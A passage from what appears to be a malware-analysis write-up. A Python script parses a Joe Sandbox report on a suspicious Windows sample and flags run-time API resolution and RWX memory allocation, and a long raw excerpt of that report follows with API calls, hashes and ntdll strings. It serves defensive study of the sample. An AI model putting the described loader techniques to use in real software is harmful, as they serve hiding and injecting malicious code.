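RESOLVER = 0x41AF60  # assumption from the call graph: stub that calls LdrLoadDll before every Nt* call
MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE = 0x1000, 0x2000, 0x40  # documented Windows values
PROTECT_NAMES = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
ADDR_RE = re.compile(r"^([0-9a-f]{5,})(?:-([0-9a-f]{5,}))?$")
API_RE = re.compile(r"^(?:• )?(\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")


@dataclass
class FunctionEntry:
    start: int
    end: int
    calls: list = field(default_factory=list)     # callees named in the graph ("call 41af60")
    api: str = ""
    dll: str = ""
    args: list = field(default_factory=list)      # logged stack slots: int, str, or None for "?"
    ref: int = 0
    findings: list = field(default_factory=list)

def parse_cfg_line(line):
    """'control_flow_graph 0 41a410-41a426 ... 2 41a427 call 41af60 0->2 2->1'
    -> (blocks, calls); edge tokens such as '0->2' and API names are skipped."""
    tokens, blocks, calls, i = line.split()[1:], [], [], 0
    while i < len(tokens):
        m = ADDR_RE.match(tokens[i + 1]) if tokens[i].isdigit() and i + 1 < len(tokens) else None
        if m:  # "<block id> <start>[-<end>]"
            blocks.append((int(m.group(1), 16), int(m.group(2) or m.group(1), 16)))
            i += 2
        elif tokens[i] == "call" and i + 1 < len(tokens):
            calls.append(int(tokens[i + 1], 16))
            i += 2
        else:
            i += 1
    return blocks, calls

def parse_arg(tok):
    """'?' -> None, hex -> int, anything else (e.g. the junk slot 'rMA') kept as text."""
    if tok == "?":
        return None
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]+", tok) else tok

def decode_allocation(args):
    """NtAllocateVirtualMemory's last two parameters are AllocationType and Protect.
    The report logs raw stack slots, so (assumption) take the first adjacent pair
    that fits those two parameters; returns None if no such pair exists."""
    for a, b in zip(args, args[1:]):
        if isinstance(a, int) and isinstance(b, int) and a & (MEM_COMMIT | MEM_RESERVE) and b in PROTECT_NAMES:
            return a, b
    return None

def assess(entry):
    """Attach the review findings for one parsed entry."""
    if RESOLVER in entry.calls:
        entry.findings.append("resolves %s at run time via 0x%x (LdrLoadDll)" % (entry.api, RESOLVER))
    if entry.api == "NtAllocateVirtualMemory" and (pair := decode_allocation(entry.args)):
        alloc, prot = pair
        flags = [n for n, v in (("MEM_COMMIT", MEM_COMMIT), ("MEM_RESERVE", MEM_RESERVE)) if alloc & v]
        entry.findings.append("allocation type %s, protection %s" % ("|".join(flags), PROTECT_NAMES[prot]))
        if prot == PAGE_EXECUTE_READWRITE:
            entry.findings.append("RWX allocation: a staging area for unpacked or injected code")
    return entry

def parse_report(text):
    """Pair each control_flow_graph line with the API bullet that follows it."""
    entries, current = [], None
    for line in text.splitlines():
        if line.startswith("control_flow_graph "):
            blocks, calls = parse_cfg_line(line)
            current = FunctionEntry(min(b[0] for b in blocks), max(b[1] for b in blocks), calls)
            entries.append(current)
        elif current and (m := API_RE.match(line)):
            current.api, current.dll = m.group(1), m.group(2)
            current.args = [parse_arg(t) for t in m.group(3).split(",")]
            current.ref = int(m.group(4), 16)
            assess(current)
    return entries

if __name__ == "__main__":
    for e in parse_report(REPORT_EXCERPT):
        print("0x%x-0x%x %s.%s ref 0x%x: %s" % (e.start, e.end, e.api, e.dll, e.ref, "; ".join(e.findings)))
```

Running it prints one line per stub; the NtAllocateVirtualMemory entry is the one that gets the RWX finding. The pairing heuristic in decode_allocation is deliberately conservative: it only reports a (AllocationType, Protect) pair when two adjacent slots both look like those parameters, and returns None for the NtClose and NtCreateFile entries, whose slots contain 0x409CF3-style return addresses that would otherwise pass a naive "has the MEM_COMMIT bit set" check.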
APIs: none recorded. This and the following entries are the stubs in the separately dumped image at 0x01110000 that the Joe Sandbox IDA plugin labels LdrInitializeThunk; the report lists no API call or string for them.
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 8a2e7e64036b59a2465e4c7ee0ea99f8fecabc2bee7d13a3fa11560797e9bfb7
                                                    • Instruction ID: 01dda8826b5a7a105dd8d46dcc220c820ef534b7643bc5fcae3cb943bea3f17b
                                                    • Opcode Fuzzy Hash: 8a2e7e64036b59a2465e4c7ee0ea99f8fecabc2bee7d13a3fa11560797e9bfb7
                                                    • Instruction Fuzzy Hash: CE90026160240403460971584514616400A97E1201B55C021E1119590DC62989916229
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f676adcd1fe981212841d48a1039df75942bd298f3fab61067c64a18f7fd18bd
                                                    • Instruction ID: bc8b1d31415c270d062fecd43da47f3ceaba6493430fe8c5a9cf4da25841cea9
                                                    • Opcode Fuzzy Hash: f676adcd1fe981212841d48a1039df75942bd298f3fab61067c64a18f7fd18bd
                                                    • Instruction Fuzzy Hash: 9C90023160140C02D6847158450464A000597D2301F95C015A012A654DCB198B5977A5
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: c60316cfdb0dba16e5e356d65ada04ce5ab40c31d6975e939bcbe5f61f27c14e
                                                    • Instruction ID: e158bec955d9ffeb5cde8fba6b17e085d8bd2b05d00d5ae4d47a31d98527bc9e
                                                    • Opcode Fuzzy Hash: c60316cfdb0dba16e5e356d65ada04ce5ab40c31d6975e939bcbe5f61f27c14e
                                                    • Instruction Fuzzy Hash: 4290043571140403070DF55C07045070047D7D7351355C031F111F550CD735CD715335
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: bb2ec34d173cf1ca56ac8c63b0e408801b040a45466e8dbd854b0dc241e82cb5
                                                    • Instruction ID: 370906c9048ad11ccbe7420747490d2bea18d30c22147759ccfa6b7d72e45815
                                                    • Opcode Fuzzy Hash: bb2ec34d173cf1ca56ac8c63b0e408801b040a45466e8dbd854b0dc241e82cb5
                                                    • Instruction Fuzzy Hash: 0A90022961340402D6847158550860A000597D2202F95D415A011A558CCA1989695325
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 9732fc6dd5f36e578f73cef31012c52a55cf542686bfd5d9a5215b53a49d158f
                                                    • Instruction ID: c75c481db7fe565689b7cac14c99a51aaa6dbd3ec15640884cbd66436cfb0ffb
                                                    • Opcode Fuzzy Hash: 9732fc6dd5f36e578f73cef31012c52a55cf542686bfd5d9a5215b53a49d158f
                                                    • Instruction Fuzzy Hash: F790022170140403D644715855186064005E7E2301F55D011E0519554CDA1989565326
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: ce7deca891ca6605d058b048600df5f141254dd76af93c85f40a4adca1720021
                                                    • Instruction ID: 94f769341c5831d9a3811a80abb5c2a9601c4d6a61f1eaef06bf416dee4396f4
                                                    • Opcode Fuzzy Hash: ce7deca891ca6605d058b048600df5f141254dd76af93c85f40a4adca1720021
                                                    • Instruction Fuzzy Hash: A8900221642445525A49B15845045074006A7E1241795C012A1519950CC62A9956D725
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 64219fee77333a259f408d763f81a0787eccba63899a90f91f6c0b869c75a0c2
                                                    • Instruction ID: c0c5458101673816b02ba26aa5e1acba579bbf911d0bf756699f354be363f8c4
                                                    • Opcode Fuzzy Hash: 64219fee77333a259f408d763f81a0787eccba63899a90f91f6c0b869c75a0c2
                                                    • Instruction Fuzzy Hash: C790023160140813D61571584604707000997D1241F95C412A0529558DD75A8A52A225
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 4a2f198333afbaac0c0dd9239819dcd55ad63414a4a78a3e43f1e4f4d2194b14
                                                    • Instruction ID: 30689f61dd810cf3603ead9ca9d9ed3fd1d02fd747140383557d48c4b58b9aa8
                                                    • Opcode Fuzzy Hash: 4a2f198333afbaac0c0dd9239819dcd55ad63414a4a78a3e43f1e4f4d2194b14
                                                    • Instruction Fuzzy Hash: 1290023160148C02D6147158850474A000597D1301F59C411A4529658DC79989917225
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: fb240bde9ed90e96c9dc7c012e9d834eedda635790144a2134d35ba761e3bee7
                                                    • Instruction ID: 518b6a0ee20492b08b29681ac14940f96db0b4d9d48e427d934c02ae50a52979
                                                    • Opcode Fuzzy Hash: fb240bde9ed90e96c9dc7c012e9d834eedda635790144a2134d35ba761e3bee7
                                                    • Instruction Fuzzy Hash: 0890023160140802D60475985508646000597E1301F55D011A5129555EC76989916235
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6ee4f93be9e47da0dc2491d946e756ac87a346bad430156dc8552c464ab61896
                                                    • Instruction ID: e1216458d1a49d6a927dcee3e75171f97e8e3b3de3ed3e025c820326db46f133
                                                    • Opcode Fuzzy Hash: 6ee4f93be9e47da0dc2491d946e756ac87a346bad430156dc8552c464ab61896
                                                    • Instruction Fuzzy Hash: AA90026174140842D60471584514B060005D7E2301F55C015E1169554DC71DCD52622A
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: e6286749a96113080ab40f3d8fccbecd4412f40ad2075fd48cf0b34c5848c49c
                                                    • Instruction ID: dd4a540615650f48a55dc8989d45d27bb0b6881ee37e244c25f19aa10c90a4cf
                                                    • Opcode Fuzzy Hash: e6286749a96113080ab40f3d8fccbecd4412f40ad2075fd48cf0b34c5848c49c
                                                    • Instruction Fuzzy Hash: 4F90023160180802D6047158491470B000597D1302F55C011A1269555DC72989516675
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 17b067ebfc1ff0c82ee1f2fd4a96d59f5421bd96f715f8de755b2750e1ee5856
                                                    • Instruction ID: 69d8a2ffdeaa1bcb67944dc896138187a1fd1b0737d862991da3817e3b0f479e
                                                    • Opcode Fuzzy Hash: 17b067ebfc1ff0c82ee1f2fd4a96d59f5421bd96f715f8de755b2750e1ee5856
                                                    • Instruction Fuzzy Hash: 15900221A01404424644716889449064005BBE2211755C121A0A9D550DC65D89655769
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 9ccf6820bc791eb4c19c81bf9358e0676ad81e70115f80128b5a85eb4300ad61
                                                    • Instruction ID: e867fbb3a4a5184c96a89b2cdc994db672448cc562f692af3603871d06bbc21e
                                                    • Opcode Fuzzy Hash: 9ccf6820bc791eb4c19c81bf9358e0676ad81e70115f80128b5a85eb4300ad61
                                                    • Instruction Fuzzy Hash: 3C900221611C0442D70475684D14B07000597D1303F55C115A0259554CCA1989615625
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b4a041419d6dce3baec6977bb455e7038ea9f85dabc5c6c71c7d32e66c83b21b
                                                    • Instruction ID: cb651da98e07eedd0241bfcb490bcdbe35d84f9f85b864cf347515f5da31ca76
                                                    • Opcode Fuzzy Hash: b4a041419d6dce3baec6977bb455e7038ea9f85dabc5c6c71c7d32e66c83b21b
                                                    • Instruction Fuzzy Hash: AB900221A0140902D60571584504616000A97D1241F95C022A1129555ECB298A92A235
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 73713b93f95b1d5f9e70dfe3d2a43096999e9499caadf2496a8663356c6d257f
                                                    • Instruction ID: 47f17c1ae86bb56e47403ad48151dfc03b7700efff5da5f23c8d3d21bfc1b801
                                                    • Opcode Fuzzy Hash: 73713b93f95b1d5f9e70dfe3d2a43096999e9499caadf2496a8663356c6d257f
                                                    • Instruction Fuzzy Hash: 6290027160140802D64471584504746000597D1301F55C011A5169554EC75D8ED56769
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                    • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                                    • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                    • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                                    Control-flow Graph
                                                    control_flow_graph 6 41a630-41a661 call 41af60 RtlAllocateHeap
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID: 6EA
                                                    • API String ID: 1279760036-1400015478
                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                    • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                    • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                    Control-flow Graph
                                                    control_flow_graph 204 408310-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 213 40835c-40836e PostThreadMessageW 204->213 214 40838e-408392 204->214 215 408370-40838a call 40a480 213->215 216 40838d 213->216 215->216 216->214
                                                    APIs
                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                    • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                    • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                    • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                    Control-flow Graph
                                                    control_flow_graph 240 41a7c1-41a7ea call 41af60 242 41a7ef-41a804 LookupPrivilegeValueW 240->242
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: bc8ed5411a357cdbc73fc6225cbb22060938e7837050913796bd82941ac21636
                                                    • Instruction ID: 8dc17872df97591ae68a0353c81d9f7144f39d9ad21942d3304e6be5dbe02fc6
                                                    • Opcode Fuzzy Hash: bc8ed5411a357cdbc73fc6225cbb22060938e7837050913796bd82941ac21636
                                                    • Instruction Fuzzy Hash: DBE06DB12002046BDB20EF54CC45EE73369EF88750F208469F91C57241D634E851CBA5
                                                    Control-flow Graph
                                                    control_flow_graph 243 41a66b-41a687 call 41af60 246 41a68c-41a6a1 RtlFreeHeap 243->246
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: 34cceeb0941b3ee2a67cc9c6f450658fbc9a786c57e1f19edd3b6c12f22c4767
                                                    • Instruction ID: 0c2061bfaf80a594025931125d7790c5c7776a48521ad5bcb17f6471027841d1
                                                    • Opcode Fuzzy Hash: 34cceeb0941b3ee2a67cc9c6f450658fbc9a786c57e1f19edd3b6c12f22c4767
                                                    • Instruction Fuzzy Hash: AFE0DFB1200204AFDB14DFA4CC44EE73768EF88354F10855AFD1C9B281C630E810CBB0
                                                    Control-flow Graph
                                                    control_flow_graph 247 41a670-41a686 248 41a68c-41a6a1 RtlFreeHeap 247->248 249 41a687 call 41af60 247->249 249->248
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                    • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                    • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                    Control-flow Graph
                                                    control_flow_graph 250 41a7d0-41a7e9 251 41a7ef-41a804 LookupPrivilegeValueW 250->251 252 41a7ea call 41af60 250->252 252->251
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                    • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                    • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                    Control-flow Graph
                                                    control_flow_graph 253 41a6a3-41a6d8 call 41af60 ExitProcess
                                                    APIs
                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: f4bc0d12741e580fd8341961b3af5887434b358ae5752c5e4236bbcc9cb28c21
                                                    • Instruction ID: a6d89d336e0b8c83ac6892cd906aa14fa15dab9997e4d17c02afebe454f5954a
                                                    • Opcode Fuzzy Hash: f4bc0d12741e580fd8341961b3af5887434b358ae5752c5e4236bbcc9cb28c21
                                                    • Instruction Fuzzy Hash: 13E0C2B03002047BD620DF64CC89FD73F69DF49764F2AC1A8B98DAB242C534EA02C7A5
                                                    APIs
                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                    • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                    • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6be6f1172b680e587512639fdb1a1fc43343166a54fd6db2e6d505164294d7ae
                                                    • Instruction ID: e7f4d61e65c81b80bab9f237f4750aa9cc9bc76564ea464632f9ed30a0aefddf
                                                    • Opcode Fuzzy Hash: 6be6f1172b680e587512639fdb1a1fc43343166a54fd6db2e6d505164294d7ae
                                                    • Instruction Fuzzy Hash: FFB09B71D019C5C5DF16F7644708717790077D1701F25C061D2134645F473CC1D1E675
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-2160512332
                                                    • Opcode ID: 199d7836dc8c03e02fb984a875d4a8e68e95401d0b89da5daed25c27a823fc1a
                                                    • Instruction ID: 99094ed79f37d37a1c74f0f73dc003cf4a604f7e8c21edb828993924f28a2dc4
                                                    • Opcode Fuzzy Hash: 199d7836dc8c03e02fb984a875d4a8e68e95401d0b89da5daed25c27a823fc1a
                                                    • Instruction Fuzzy Hash: CD929F71614742AFE729DF28C880F6BB7E8BBA4B54F04492DFA94D7250D770E844CB92
                                                    Strings
                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 011B5543
                                                    • double initialized or corrupted critical section, xrefs: 011B5508
                                                    • Critical section debug info address, xrefs: 011B541F, 011B552E
                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011B54CE
                                                    • undeleted critical section in freed memory, xrefs: 011B542B
                                                    • Address of the debug info found in the active list., xrefs: 011B54AE, 011B54FA
                                                    • Thread identifier, xrefs: 011B553A
                                                    • Invalid debug info address of this critical section, xrefs: 011B54B6
                                                    • 8, xrefs: 011B52E3
                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011B54E2
                                                    • Critical section address, xrefs: 011B5425, 011B54BC, 011B5534
                                                    • corrupted critical section, xrefs: 011B54C2
